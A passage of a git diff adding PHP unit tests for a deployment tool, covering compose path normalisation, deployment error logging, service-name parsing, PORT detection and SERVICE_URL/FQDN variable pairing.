expect($path)->not->toContain('//'); +}); + +it('normalizes path when baseDirectory has trailing slash', function () { + $baseDirectory = '/backend/'; + $composeLocation = '/docker-compose.yaml'; + + // Normalize baseDirectory to prevent double slashes + $normalizedBase = $baseDirectory === '/' ? '' : rtrim($baseDirectory, '/'); + $path = ".{$normalizedBase}{$composeLocation}"; + + expect($path)->toBe('./backend/docker-compose.yaml'); + expect($path)->not->toContain('//'); +}); + +it('handles empty baseDirectory correctly', function () { + $baseDirectory = ''; + $composeLocation = '/docker-compose.yaml'; + + // Normalize baseDirectory to prevent double slashes + $normalizedBase = $baseDirectory === '/' ? '' : rtrim($baseDirectory, '/'); + $path = ".{$normalizedBase}{$composeLocation}"; + + expect($path)->toBe('./docker-compose.yaml'); + expect($path)->not->toContain('//'); +}); + +it('handles normal baseDirectory without trailing slash', function () { + $baseDirectory = '/backend'; + $composeLocation = '/docker-compose.yaml'; + + // Normalize baseDirectory to prevent double slashes + $normalizedBase = $baseDirectory === '/' ? '' : rtrim($baseDirectory, '/'); + $path = ".{$normalizedBase}{$composeLocation}"; + + expect($path)->toBe('./backend/docker-compose.yaml'); + expect($path)->not->toContain('//'); +}); + +it('handles nested baseDirectory with trailing slash', function () { + $baseDirectory = '/app/backend/'; + $composeLocation = '/docker-compose.prod.yaml'; + + // Normalize baseDirectory to prevent double slashes + $normalizedBase = $baseDirectory === '/' ? '' : rtrim($baseDirectory, '/'); + $path = ".{$normalizedBase}{$composeLocation}"; + + expect($path)->toBe('./app/backend/docker-compose.prod.yaml'); + expect($path)->not->toContain('//'); +}); + +it('produces correct preview path with normalized baseDirectory', function () { + $testCases = [ + ['baseDir' => '/', 'compose' => '/docker-compose.yaml', 'expected' => './docker-compose.yaml'], + ['baseDir' => '', 'compose' => '/docker-compose.yaml', 'expected' => './docker-compose.yaml'], + ['baseDir' => '/backend', 'compose' => '/docker-compose.yaml', 'expected' => './backend/docker-compose.yaml'], + ['baseDir' => '/backend/', 'compose' => '/docker-compose.yaml', 'expected' => './backend/docker-compose.yaml'], + ['baseDir' => '/app/src/', 'compose' => '/docker-compose.prod.yaml', 'expected' => './app/src/docker-compose.prod.yaml'], + ]; + + foreach ($testCases as $case) { + $normalizedBase = $case['baseDir'] === '/' ? '' : rtrim($case['baseDir'], '/'); + $path = ".{$normalizedBase}{$case['compose']}"; + + expect($path)->toBe($case['expected'], "Failed for baseDir: {$case['baseDir']}"); + expect($path)->not->toContain('//', "Double slash found for baseDir: {$case['baseDir']}"); + } +}); diff --git a/tests/Unit/ApplicationDeploymentErrorLoggingTest.php b/tests/Unit/ApplicationDeploymentErrorLoggingTest.php new file mode 100644 index 000000000..c6210639a --- /dev/null +++ b/tests/Unit/ApplicationDeploymentErrorLoggingTest.php @@ -0,0 +1,344 @@ +shouldReceive('addLogEntry') + ->withArgs(function ($message, $type = 'stdout', $hidden = false) use (&$logEntries) { + $logEntries[] = ['message' => $message, 'type' => $type, 'hidden' => $hidden]; + + return true; + }) + ->atLeast()->once(); + + $mockQueue->shouldReceive('update')->andReturn(true); + + // Mock Application and its relationships + $mockApplication = Mockery::mock(Application::class); + $mockApplication->shouldReceive('getAttribute') + ->with('build_pack') + ->andReturn('dockerfile'); + $mockApplication->shouldReceive('setAttribute') + ->with('build_pack', 'dockerfile') + ->andReturnSelf(); + $mockApplication->build_pack = 'dockerfile'; + + $mockSettings = Mockery::mock(); + $mockSettings->shouldReceive('getAttribute') + ->with('is_consistent_container_name_enabled') + ->andReturn(false); + $mockSettings->shouldReceive('getAttribute') + ->with('custom_internal_name') + ->andReturn(''); + $mockSettings->shouldReceive('setAttribute') + ->andReturnSelf(); + $mockSettings->is_consistent_container_name_enabled = false; + $mockSettings->custom_internal_name = ''; + + $mockApplication->shouldReceive('getAttribute') + ->with('settings') + ->andReturn($mockSettings); + + // Use reflection to set private properties and call the failed() method + $job = Mockery::mock(ApplicationDeploymentJob::class)->makePartial(); + $job->shouldAllowMockingProtectedMethods(); + + $reflection = new \ReflectionClass(ApplicationDeploymentJob::class); + + $queueProperty = $reflection->getProperty('application_deployment_queue'); + $queueProperty->setAccessible(true); + $queueProperty->setValue($job, $mockQueue); + + $applicationProperty = $reflection->getProperty('application'); + $applicationProperty->setAccessible(true); + $applicationProperty->setValue($job, $mockApplication); + + $pullRequestProperty = $reflection->getProperty('pull_request_id'); + $pullRequestProperty->setAccessible(true); + $pullRequestProperty->setValue($job, 0); + + $containerNameProperty = $reflection->getProperty('container_name'); + $containerNameProperty->setAccessible(true); + $containerNameProperty->setValue($job, 'test-container'); + + // Mock the failDeployment method to prevent errors + $job->shouldReceive('failDeployment')->andReturn(); + $job->shouldReceive('execute_remote_command')->andReturn(); + + // Call the failed method + $failedMethod = $reflection->getMethod('failed'); + $failedMethod->setAccessible(true); + $failedMethod->invoke($job, $exception); + + // Verify comprehensive error logging + $errorMessages = array_column($logEntries, 'message'); + $errorMessageString = implode("\n", $errorMessages); + + // Check that all critical information is logged + expect($errorMessageString)->toContain('Deployment failed: Failed to start container'); + expect($errorMessageString)->toContain('Error type: App\Exceptions\DeploymentException'); + expect($errorMessageString)->toContain('Error code: 500'); + expect($errorMessageString)->toContain('Location:'); + expect($errorMessageString)->toContain('Caused by:'); + expect($errorMessageString)->toContain('RuntimeException: Connection refused'); + expect($errorMessageString)->toContain('Stack trace'); + + // Verify stderr type is used for error logging + $stderrEntries = array_filter($logEntries, fn ($entry) => $entry['type'] === 'stderr'); + expect(count($stderrEntries))->toBeGreaterThan(0); + + // Verify that the main error message is NOT hidden + $mainErrorEntry = collect($logEntries)->first(fn ($entry) => str_contains($entry['message'], 'Deployment failed: Failed to start container')); + expect($mainErrorEntry['hidden'])->toBeFalse(); + + // Verify that technical details ARE hidden + $errorTypeEntry = collect($logEntries)->first(fn ($entry) => str_contains($entry['message'], 'Error type:')); + expect($errorTypeEntry['hidden'])->toBeTrue(); + + $errorCodeEntry = collect($logEntries)->first(fn ($entry) => str_contains($entry['message'], 'Error code:')); + expect($errorCodeEntry['hidden'])->toBeTrue(); + + $locationEntry = collect($logEntries)->first(fn ($entry) => str_contains($entry['message'], 'Location:')); + expect($locationEntry['hidden'])->toBeTrue(); + + $stackTraceEntry = collect($logEntries)->first(fn ($entry) => str_contains($entry['message'], 'Stack trace')); + expect($stackTraceEntry['hidden'])->toBeTrue(); + + $causedByEntry = collect($logEntries)->first(fn ($entry) => str_contains($entry['message'], 'Caused by:')); + expect($causedByEntry['hidden'])->toBeTrue(); +}); + +it('handles exceptions with no message gracefully', function () { + $exception = new \Exception; + + $mockQueue = Mockery::mock(ApplicationDeploymentQueue::class); + $logEntries = []; + + $mockQueue->shouldReceive('addLogEntry') + ->withArgs(function ($message, $type = 'stdout', $hidden = false) use (&$logEntries) { + $logEntries[] = ['message' => $message, 'type' => $type, 'hidden' => $hidden]; + + return true; + }) + ->atLeast()->once(); + + $mockQueue->shouldReceive('update')->andReturn(true); + + $mockApplication = Mockery::mock(Application::class); + $mockApplication->shouldReceive('getAttribute') + ->with('build_pack') + ->andReturn('dockerfile'); + $mockApplication->shouldReceive('setAttribute') + ->with('build_pack', 'dockerfile') + ->andReturnSelf(); + $mockApplication->build_pack = 'dockerfile'; + + $mockSettings = Mockery::mock(); + $mockSettings->shouldReceive('getAttribute') + ->with('is_consistent_container_name_enabled') + ->andReturn(false); + $mockSettings->shouldReceive('getAttribute') + ->with('custom_internal_name') + ->andReturn(''); + $mockSettings->shouldReceive('setAttribute') + ->andReturnSelf(); + $mockSettings->is_consistent_container_name_enabled = false; + $mockSettings->custom_internal_name = ''; + + $mockApplication->shouldReceive('getAttribute') + ->with('settings') + ->andReturn($mockSettings); + + $job = Mockery::mock(ApplicationDeploymentJob::class)->makePartial(); + $job->shouldAllowMockingProtectedMethods(); + + $reflection = new \ReflectionClass(ApplicationDeploymentJob::class); + + $queueProperty = $reflection->getProperty('application_deployment_queue'); + $queueProperty->setAccessible(true); + $queueProperty->setValue($job, $mockQueue); + + $applicationProperty = $reflection->getProperty('application'); + $applicationProperty->setAccessible(true); + $applicationProperty->setValue($job, $mockApplication); + + $pullRequestProperty = $reflection->getProperty('pull_request_id'); + $pullRequestProperty->setAccessible(true); + $pullRequestProperty->setValue($job, 0); + + $containerNameProperty = $reflection->getProperty('container_name'); + $containerNameProperty->setAccessible(true); + $containerNameProperty->setValue($job, 'test-container'); + + $job->shouldReceive('failDeployment')->andReturn(); + $job->shouldReceive('execute_remote_command')->andReturn(); + + $failedMethod = $reflection->getMethod('failed'); + $failedMethod->setAccessible(true); + $failedMethod->invoke($job, $exception); + + $errorMessages = array_column($logEntries, 'message'); + $errorMessageString = implode("\n", $errorMessages); + + // Should log "Unknown error occurred" for empty messages + expect($errorMessageString)->toContain('Unknown error occurred'); + expect($errorMessageString)->toContain('Error type:'); +}); + +it('wraps exceptions in deployment methods with DeploymentException', function () { + // Verify that our deployment methods wrap exceptions properly + $originalException = new \RuntimeException('Container not found'); + + try { + throw new DeploymentException('Failed to start container', 0, $originalException); + } catch (DeploymentException $e) { + expect($e->getMessage())->toBe('Failed to start container'); + expect($e->getPrevious())->toBe($originalException); + expect($e->getPrevious()->getMessage())->toBe('Container not found'); + } +}); + +it('logs error code 0 correctly', function () { + // Verify that error code 0 is logged (previously skipped due to falsy check) + $exception = new \Exception('Test error', 0); + + $mockQueue = Mockery::mock(ApplicationDeploymentQueue::class); + $logEntries = []; + + $mockQueue->shouldReceive('addLogEntry') + ->withArgs(function ($message, $type = 'stdout', $hidden = false) use (&$logEntries) { + $logEntries[] = ['message' => $message, 'type' => $type, 'hidden' => $hidden]; + + return true; + }) + ->atLeast()->once(); + + $mockQueue->shouldReceive('update')->andReturn(true); + + $mockApplication = Mockery::mock(Application::class); + $mockApplication->shouldReceive('getAttribute') + ->with('build_pack') + ->andReturn('dockerfile'); + $mockApplication->shouldReceive('setAttribute') + ->with('build_pack', 'dockerfile') + ->andReturnSelf(); + $mockApplication->build_pack = 'dockerfile'; + + $mockSettings = Mockery::mock(); + $mockSettings->shouldReceive('getAttribute') + ->with('is_consistent_container_name_enabled') + ->andReturn(false); + $mockSettings->shouldReceive('getAttribute') + ->with('custom_internal_name') + ->andReturn(''); + $mockSettings->shouldReceive('setAttribute') + ->andReturnSelf(); + $mockSettings->is_consistent_container_name_enabled = false; + $mockSettings->custom_internal_name = ''; + + $mockApplication->shouldReceive('getAttribute') + ->with('settings') + ->andReturn($mockSettings); + + $job = Mockery::mock(ApplicationDeploymentJob::class)->makePartial(); + $job->shouldAllowMockingProtectedMethods(); + + $reflection = new \ReflectionClass(ApplicationDeploymentJob::class); + + $queueProperty = $reflection->getProperty('application_deployment_queue'); + $queueProperty->setAccessible(true); + $queueProperty->setValue($job, $mockQueue); + + $applicationProperty = $reflection->getProperty('application'); + $applicationProperty->setAccessible(true); + $applicationProperty->setValue($job, $mockApplication); + + $pullRequestProperty = $reflection->getProperty('pull_request_id'); + $pullRequestProperty->setAccessible(true); + $pullRequestProperty->setValue($job, 0); + + $containerNameProperty = $reflection->getProperty('container_name'); + $containerNameProperty->setAccessible(true); + $containerNameProperty->setValue($job, 'test-container'); + + $job->shouldReceive('failDeployment')->andReturn(); + $job->shouldReceive('execute_remote_command')->andReturn(); + + $failedMethod = $reflection->getMethod('failed'); + $failedMethod->setAccessible(true); + $failedMethod->invoke($job, $exception); + + $errorMessages = array_column($logEntries, 'message'); + $errorMessageString = implode("\n", $errorMessages); + + // Should log error code 0 (not skip it) + expect($errorMessageString)->toContain('Error code: 0'); +}); + +it('preserves original exception type in wrapped DeploymentException messages', function () { + // Verify that when wrapping exceptions, the original exception type is included in the message + $originalException = new \RuntimeException('Connection timeout'); + + // Test rolling update scenario + $wrappedException = new DeploymentException( + 'Rolling update failed ('.get_class($originalException).'): '.$originalException->getMessage(), + $originalException->getCode(), + $originalException + ); + + expect($wrappedException->getMessage())->toContain('RuntimeException'); + expect($wrappedException->getMessage())->toContain('Connection timeout'); + expect($wrappedException->getPrevious())->toBe($originalException); + + // Test health check scenario + $healthCheckException = new \InvalidArgumentException('Invalid health check URL'); + $wrappedHealthCheck = new DeploymentException( + 'Health check failed ('.get_class($healthCheckException).'): '.$healthCheckException->getMessage(), + $healthCheckException->getCode(), + $healthCheckException + ); + + expect($wrappedHealthCheck->getMessage())->toContain('InvalidArgumentException'); + expect($wrappedHealthCheck->getMessage())->toContain('Invalid health check URL'); + expect($wrappedHealthCheck->getPrevious())->toBe($healthCheckException); + + // Test docker registry push scenario + $registryException = new \RuntimeException('Failed to authenticate'); + $wrappedRegistry = new DeploymentException( + get_class($registryException).': '.$registryException->getMessage(), + $registryException->getCode(), + $registryException + ); + + expect($wrappedRegistry->getMessage())->toContain('RuntimeException'); + expect($wrappedRegistry->getMessage())->toContain('Failed to authenticate'); + expect($wrappedRegistry->getPrevious())->toBe($registryException); +}); diff --git a/tests/Unit/ApplicationParserStringableTest.php b/tests/Unit/ApplicationParserStringableTest.php new file mode 100644 index 000000000..dfb1870db --- /dev/null +++ b/tests/Unit/ApplicationParserStringableTest.php @@ -0,0 +1,182 @@ +replace('_', '-')->value(); + $originalServiceName = str($serviceName)->replace('_', '-')->value(); + + // Line 541: $serviceName = str($serviceName)->replace('-', '_')->replace('.', '_')->value(); + $serviceName = str($serviceName)->replace('-', '_')->replace('.', '_')->value(); + + // Verify both are plain strings, not Stringable objects + expect(is_string($originalServiceName))->toBeTrue('$originalServiceName should be a plain string'); + expect(is_string($serviceName))->toBeTrue('$serviceName should be a plain string'); + expect($originalServiceName)->not->toBeInstanceOf(\Illuminate\Support\Stringable::class); + expect($serviceName)->not->toBeInstanceOf(\Illuminate\Support\Stringable::class); + + // Verify the transformations work correctly + expect($originalServiceName)->toBe('my-service'); + expect($serviceName)->toBe('my_service'); +}); + +it('ensures strict comparison works with normalized service names', function () { + // This tests the fix for line 606 where strict comparison failed + + // Simulate service name from docker-compose services array (line 604-605) + $serviceNameKey = 'my-service'; + $transformedServiceName = str($serviceNameKey)->replace('-', '_')->replace('.', '_')->value(); + + // Simulate service name from environment variable parsing (line 520, 541) + $parsed = parseServiceEnvironmentVariable('SERVICE_URL_my-service'); + $serviceName = $parsed['service_name']; + $serviceName = str($serviceName)->replace('-', '_')->replace('.', '_')->value(); + + // Line 606: if ($transformedServiceName === $serviceName) + // This MUST work - both should be plain strings and match + expect($transformedServiceName === $serviceName)->toBeTrue( + 'Strict comparison should work when both are plain strings' + ); + expect($transformedServiceName)->toBe($serviceName); +}); + +it('ensures collection key lookup works with normalized service names', function () { + // This tests the fix for line 615 where collection->get() failed + + // Simulate service name normalization (line 541) + $parsed = parseServiceEnvironmentVariable('SERVICE_URL_app-name'); + $serviceName = $parsed['service_name']; + $serviceName = str($serviceName)->replace('-', '_')->replace('.', '_')->value(); + + // Create a collection like $domains at line 614 + $domains = collect([ + 'app_name' => [ + 'domain' => 'https://example.com', + ], + ]); + + // Line 615: $domainExists = data_get($domains->get($serviceName), 'domain'); + // This MUST work - $serviceName should be a plain string 'app_name' + $domainExists = data_get($domains->get($serviceName), 'domain'); + + expect($domainExists)->toBe('https://example.com', 'Collection lookup should find the domain'); + expect($domainExists)->not->toBeNull('Collection lookup should not return null'); +}); + +it('handles service names with dots correctly', function () { + // Test service names with dots (e.g., 'my.service') + + $parsed = parseServiceEnvironmentVariable('SERVICE_URL_my.service'); + $serviceName = $parsed['service_name']; + $serviceName = str($serviceName)->replace('-', '_')->replace('.', '_')->value(); + + expect(is_string($serviceName))->toBeTrue(); + expect($serviceName)->toBe('my_service'); + + // Verify it matches transformed service name from docker-compose + $serviceNameKey = 'my.service'; + $transformedServiceName = str($serviceNameKey)->replace('-', '_')->replace('.', '_')->value(); + + expect($transformedServiceName === $serviceName)->toBeTrue(); +}); + +it('handles service names with underscores correctly', function () { + // Test service names that already have underscores + + $parsed = parseServiceEnvironmentVariable('SERVICE_URL_my_service'); + $serviceName = $parsed['service_name']; + $serviceName = str($serviceName)->replace('-', '_')->replace('.', '_')->value(); + + expect(is_string($serviceName))->toBeTrue(); + expect($serviceName)->toBe('my_service'); +}); + +it('handles mixed special characters in service names', function () { + // Test service names with mix of dashes, dots, underscores + + $parsed = parseServiceEnvironmentVariable('SERVICE_URL_my-app.service_v2'); + $serviceName = $parsed['service_name']; + $serviceName = str($serviceName)->replace('-', '_')->replace('.', '_')->value(); + + expect(is_string($serviceName))->toBeTrue(); + expect($serviceName)->toBe('my_app_service_v2'); + + // Verify collection operations work + $domains = collect([ + 'my_app_service_v2' => ['domain' => 'https://test.com'], + ]); + + $found = $domains->get($serviceName); + expect($found)->not->toBeNull(); + expect($found['domain'])->toBe('https://test.com'); +}); + +it('ensures originalServiceName conversion works for FQDN generation', function () { + // Test line 539: $originalServiceName conversion + + $parsed = parseServiceEnvironmentVariable('SERVICE_URL_my_service'); + $serviceName = $parsed['service_name']; // 'my_service' + + // Line 539: Convert underscores to dashes for FQDN generation + $originalServiceName = str($serviceName)->replace('_', '-')->value(); + + expect(is_string($originalServiceName))->toBeTrue(); + expect($originalServiceName)->not->toBeInstanceOf(\Illuminate\Support\Stringable::class); + expect($originalServiceName)->toBe('my-service'); + + // Verify it can be used in string interpolation (line 544) + $uuid = 'test-uuid'; + $random = "$originalServiceName-$uuid"; + expect($random)->toBe('my-service-test-uuid'); +}); + +it('prevents duplicate domain entries in collection', function () { + // This tests that using plain strings prevents duplicate entries + // (one with Stringable key, one with string key) + + $parsed = parseServiceEnvironmentVariable('SERVICE_URL_webapp'); + $serviceName = $parsed['service_name']; + $serviceName = str($serviceName)->replace('-', '_')->replace('.', '_')->value(); + + $domains = collect(); + + // Add domain entry (line 621) + $domains->put($serviceName, [ + 'domain' => 'https://webapp.com', + ]); + + // Try to lookup the domain (line 615) + $found = $domains->get($serviceName); + + expect($found)->not->toBeNull('Should find the domain we just added'); + expect($found['domain'])->toBe('https://webapp.com'); + + // Verify only one entry exists + expect($domains->count())->toBe(1); + expect($domains->has($serviceName))->toBeTrue(); +}); + +it('verifies parsers.php has the ->value() calls', function () { + // Ensure the fix is actually in the code + $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php'); + + // Line 539: Check originalServiceName conversion + expect($parsersFile)->toContain("str(\$serviceName)->replace('_', '-')->value()"); + + // Line 541: Check serviceName normalization + expect($parsersFile)->toContain("str(\$serviceName)->replace('-', '_')->replace('.', '_')->value()"); +}); diff --git a/tests/Unit/ApplicationPortDetectionTest.php b/tests/Unit/ApplicationPortDetectionTest.php new file mode 100644 index 000000000..1babdcf49 --- /dev/null +++ b/tests/Unit/ApplicationPortDetectionTest.php @@ -0,0 +1,156 @@ +makePartial(); + + // Mock environment variables collection with PORT set to 3000 + $portEnvVar = Mockery::mock(EnvironmentVariable::class); + $portEnvVar->shouldReceive('getAttribute')->with('real_value')->andReturn('3000'); + + $envVars = new Collection([$portEnvVar]); + $application->shouldReceive('getAttribute') + ->with('environment_variables') + ->andReturn($envVars); + + // Mock the firstWhere method to return our PORT env var + $envVars = Mockery::mock(Collection::class); + $envVars->shouldReceive('firstWhere')->with('key', 'PORT')->andReturn($portEnvVar); + $application->shouldReceive('getAttribute') + ->with('environment_variables') + ->andReturn($envVars); + + // Call the method we're testing + $detectedPort = $application->detectPortFromEnvironment(); + + expect($detectedPort)->toBe(3000); +}); + +it('returns null when PORT environment variable is not set', function () { + $application = Mockery::mock(Application::class)->makePartial(); + + // Mock environment variables collection without PORT + $envVars = Mockery::mock(Collection::class); + $envVars->shouldReceive('firstWhere')->with('key', 'PORT')->andReturn(null); + $application->shouldReceive('getAttribute') + ->with('environment_variables') + ->andReturn($envVars); + + $detectedPort = $application->detectPortFromEnvironment(); + + expect($detectedPort)->toBeNull(); +}); + +it('returns null when PORT value is not numeric', function () { + $application = Mockery::mock(Application::class)->makePartial(); + + // Mock environment variables with non-numeric PORT value + $portEnvVar = Mockery::mock(EnvironmentVariable::class); + $portEnvVar->shouldReceive('getAttribute')->with('real_value')->andReturn('invalid-port'); + + $envVars = Mockery::mock(Collection::class); + $envVars->shouldReceive('firstWhere')->with('key', 'PORT')->andReturn($portEnvVar); + $application->shouldReceive('getAttribute') + ->with('environment_variables') + ->andReturn($envVars); + + $detectedPort = $application->detectPortFromEnvironment(); + + expect($detectedPort)->toBeNull(); +}); + +it('handles PORT value with whitespace', function () { + $application = Mockery::mock(Application::class)->makePartial(); + + // Mock environment variables with PORT value that has whitespace + $portEnvVar = Mockery::mock(EnvironmentVariable::class); + $portEnvVar->shouldReceive('getAttribute')->with('real_value')->andReturn(' 8080 '); + + $envVars = Mockery::mock(Collection::class); + $envVars->shouldReceive('firstWhere')->with('key', 'PORT')->andReturn($portEnvVar); + $application->shouldReceive('getAttribute') + ->with('environment_variables') + ->andReturn($envVars); + + $detectedPort = $application->detectPortFromEnvironment(); + + expect($detectedPort)->toBe(8080); +}); + +it('detects PORT from preview environment variables when isPreview is true', function () { + $application = Mockery::mock(Application::class)->makePartial(); + + // Mock preview environment variables with PORT + $portEnvVar = Mockery::mock(EnvironmentVariable::class); + $portEnvVar->shouldReceive('getAttribute')->with('real_value')->andReturn('4000'); + + $envVars = Mockery::mock(Collection::class); + $envVars->shouldReceive('firstWhere')->with('key', 'PORT')->andReturn($portEnvVar); + $application->shouldReceive('getAttribute') + ->with('environment_variables_preview') + ->andReturn($envVars); + + $detectedPort = $application->detectPortFromEnvironment(true); + + expect($detectedPort)->toBe(4000); +}); + +it('verifies ports_exposes array conversion logic', function () { + // Test the logic that converts comma-separated ports to array + $portsExposesString = '3000,3001,8080'; + $expectedArray = [3000, 3001, 8080]; + + // This simulates what portsExposesArray accessor does + $result = is_null($portsExposesString) + ? [] + : explode(',', $portsExposesString); + + // Convert to integers for comparison + $result = array_map('intval', $result); + + expect($result)->toBe($expectedArray); +}); + +it('verifies PORT matches detection logic', function () { + $detectedPort = 3000; + $portsExposesArray = [3000, 3001]; + + $isMatch = in_array($detectedPort, $portsExposesArray); + + expect($isMatch)->toBeTrue(); +}); + +it('verifies PORT mismatch detection logic', function () { + $detectedPort = 8080; + $portsExposesArray = [3000, 3001]; + + $isMatch = in_array($detectedPort, $portsExposesArray); + + expect($isMatch)->toBeFalse(); +}); + +it('verifies empty ports_exposes detection logic', function () { + $portsExposesArray = []; + + $isEmpty = empty($portsExposesArray); + + expect($isEmpty)->toBeTrue(); +}); diff --git a/tests/Unit/ApplicationServiceEnvironmentVariablesTest.php b/tests/Unit/ApplicationServiceEnvironmentVariablesTest.php new file mode 100644 index 000000000..fe1a89443 --- /dev/null +++ b/tests/Unit/ApplicationServiceEnvironmentVariablesTest.php @@ -0,0 +1,190 @@ +toContain('ALWAYS create BOTH SERVICE_URL and SERVICE_FQDN pairs'); + expect($parsersFile)->toContain('SERVICE_FQDN_{$serviceName}'); + expect($parsersFile)->toContain('SERVICE_URL_{$serviceName}'); +}); + +it('extracts service name with case preservation for applications', function () { + // Simulate what the parser does for applications + $templateVar = 'SERVICE_URL_WORDPRESS'; + + $strKey = str($templateVar); + $parsed = parseServiceEnvironmentVariable($templateVar); + + if ($parsed['has_port']) { + $serviceName = $strKey->after('SERVICE_URL_')->beforeLast('_')->value(); + } else { + $serviceName = $strKey->after('SERVICE_URL_')->value(); + } + + expect($serviceName)->toBe('WORDPRESS'); + expect($parsed['service_name'])->toBe('wordpress'); // lowercase for internal use +}); + +it('handles port-specific application service variables', function () { + $templateVar = 'SERVICE_URL_APP_3000'; + + $strKey = str($templateVar); + $parsed = parseServiceEnvironmentVariable($templateVar); + + if ($parsed['has_port']) { + $serviceName = $strKey->after('SERVICE_URL_')->beforeLast('_')->value(); + } else { + $serviceName = $strKey->after('SERVICE_URL_')->value(); + } + + expect($serviceName)->toBe('APP'); + expect($parsed['port'])->toBe('3000'); + expect($parsed['has_port'])->toBeTrue(); +}); + +it('application should create 2 base variables when template has base SERVICE_URL', function () { + // Given: Template defines SERVICE_URL_WP + // Then: Should create both: + // 1. SERVICE_URL_WP + // 2. SERVICE_FQDN_WP + + $templateVar = 'SERVICE_URL_WP'; + $strKey = str($templateVar); + $parsed = parseServiceEnvironmentVariable($templateVar); + + $serviceName = $strKey->after('SERVICE_URL_')->value(); + + $urlKey = "SERVICE_URL_{$serviceName}"; + $fqdnKey = "SERVICE_FQDN_{$serviceName}"; + + expect($urlKey)->toBe('SERVICE_URL_WP'); + expect($fqdnKey)->toBe('SERVICE_FQDN_WP'); + expect($parsed['has_port'])->toBeFalse(); +}); + +it('application should create 4 variables when template has port-specific SERVICE_URL', function () { + // Given: Template defines SERVICE_URL_APP_8080 + // Then: Should create all 4: + // 1. SERVICE_URL_APP (base) + // 2. SERVICE_FQDN_APP (base) + // 3. SERVICE_URL_APP_8080 (port-specific) + // 4. SERVICE_FQDN_APP_8080 (port-specific) + + $templateVar = 'SERVICE_URL_APP_8080'; + $strKey = str($templateVar); + $parsed = parseServiceEnvironmentVariable($templateVar); + + $serviceName = $strKey->after('SERVICE_URL_')->beforeLast('_')->value(); + $port = $parsed['port']; + + $baseUrlKey = "SERVICE_URL_{$serviceName}"; + $baseFqdnKey = "SERVICE_FQDN_{$serviceName}"; + $portUrlKey = "SERVICE_URL_{$serviceName}_{$port}"; + $portFqdnKey = "SERVICE_FQDN_{$serviceName}_{$port}"; + + expect($baseUrlKey)->toBe('SERVICE_URL_APP'); + expect($baseFqdnKey)->toBe('SERVICE_FQDN_APP'); + expect($portUrlKey)->toBe('SERVICE_URL_APP_8080'); + expect($portFqdnKey)->toBe('SERVICE_FQDN_APP_8080'); +}); + +it('application should create pairs when template has only SERVICE_FQDN', function () { + // Given: Template defines SERVICE_FQDN_DB + // Then: Should create both: + // 1. SERVICE_FQDN_DB + // 2. SERVICE_URL_DB (created automatically) + + $templateVar = 'SERVICE_FQDN_DB'; + $strKey = str($templateVar); + $parsed = parseServiceEnvironmentVariable($templateVar); + + $serviceName = $strKey->after('SERVICE_FQDN_')->value(); + + $urlKey = "SERVICE_URL_{$serviceName}"; + $fqdnKey = "SERVICE_FQDN_{$serviceName}"; + + expect($fqdnKey)->toBe('SERVICE_FQDN_DB'); + expect($urlKey)->toBe('SERVICE_URL_DB'); + expect($parsed['has_port'])->toBeFalse(); +}); + +it('verifies application deletion nulls both URL and FQDN', function () { + $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php'); + + // Check that deletion handles both types + expect($parsersFile)->toContain('SERVICE_FQDN_{$serviceNameFormatted}'); + expect($parsersFile)->toContain('SERVICE_URL_{$serviceNameFormatted}'); + + // Both should be set to null when domain is empty + expect($parsersFile)->toContain('\'value\' => null'); +}); + +it('handles abbreviated service names in applications', function () { + // Applications can have abbreviated names in compose files just like services + $templateVar = 'SERVICE_URL_WP'; // WordPress abbreviated + + $strKey = str($templateVar); + $serviceName = $strKey->after('SERVICE_URL_')->value(); + + expect($serviceName)->toBe('WP'); + expect($serviceName)->not->toBe('WORDPRESS'); +}); + +it('application compose parsing creates pairs regardless of template type', function () { + // Test that whether template uses SERVICE_URL or SERVICE_FQDN, + // the parser creates both + + $testCases = [ + 'SERVICE_URL_APP' => ['base' => 'APP', 'port' => null], + 'SERVICE_FQDN_APP' => ['base' => 'APP', 'port' => null], + 'SERVICE_URL_APP_3000' => ['base' => 'APP', 'port' => '3000'], + 'SERVICE_FQDN_APP_3000' => ['base' => 'APP', 'port' => '3000'], + ]; + + foreach ($testCases as $templateVar => $expected) { + $strKey = str($templateVar); + $parsed = parseServiceEnvironmentVariable($templateVar); + + if ($parsed['has_port']) { + if ($strKey->startsWith('SERVICE_URL_')) { + $serviceName = $strKey->after('SERVICE_URL_')->beforeLast('_')->value(); + } else { + $serviceName = $strKey->after('SERVICE_FQDN_')->beforeLast('_')->value(); + } + } else { + if ($strKey->startsWith('SERVICE_URL_')) { + $serviceName = $strKey->after('SERVICE_URL_')->value(); + } else { + $serviceName = $strKey->after('SERVICE_FQDN_')->value(); + } + } + + expect($serviceName)->toBe($expected['base'], "Failed for $templateVar"); + expect($parsed['port'])->toBe($expected['port'], "Port mismatch for $templateVar"); + } +}); + +it('verifies both application and service use same logic', function () { + $servicesFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/services.php'); + $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php'); + + // Both should have the same pattern of creating pairs + expect($servicesFile)->toContain('ALWAYS create base pair'); + expect($parsersFile)->toContain('ALWAYS create BOTH'); + + // Both should create SERVICE_URL_ + expect($servicesFile)->toContain('SERVICE_URL_{$serviceName}'); + expect($parsersFile)->toContain('SERVICE_URL_{$serviceName}'); + + // Both should create SERVICE_FQDN_ + expect($servicesFile)->toContain('SERVICE_FQDN_{$serviceName}'); + expect($parsersFile)->toContain('SERVICE_FQDN_{$serviceName}'); +}); diff --git a/tests/Unit/CheckTraefikVersionForServerJobTest.php b/tests/Unit/CheckTraefikVersionForServerJobTest.php new file mode 100644 index 000000000..5da6f97d8 --- /dev/null +++ b/tests/Unit/CheckTraefikVersionForServerJobTest.php @@ -0,0 +1,141 @@ +traefikVersions = [ + 'v3.5' => '3.5.6', + 'v3.6' => '3.6.2', + ]; +}); + +it('has correct queue and retry configuration', function () { + $server = \Mockery::mock(Server::class)->makePartial(); + $job = new CheckTraefikVersionForServerJob($server, $this->traefikVersions); + + expect($job->tries)->toBe(3); + expect($job->timeout)->toBe(60); + expect($job->server)->toBe($server); + expect($job->traefikVersions)->toBe($this->traefikVersions); +}); + +it('parses version strings correctly', function () { + $version = 'v3.5.0'; + $current = ltrim($version, 'v'); + + expect($current)->toBe('3.5.0'); + + preg_match('/^(\d+\.\d+)\.(\d+)$/', $current, $matches); + + expect($matches[1])->toBe('3.5'); // branch + expect($matches[2])->toBe('0'); // patch +}); + +it('compares versions correctly for 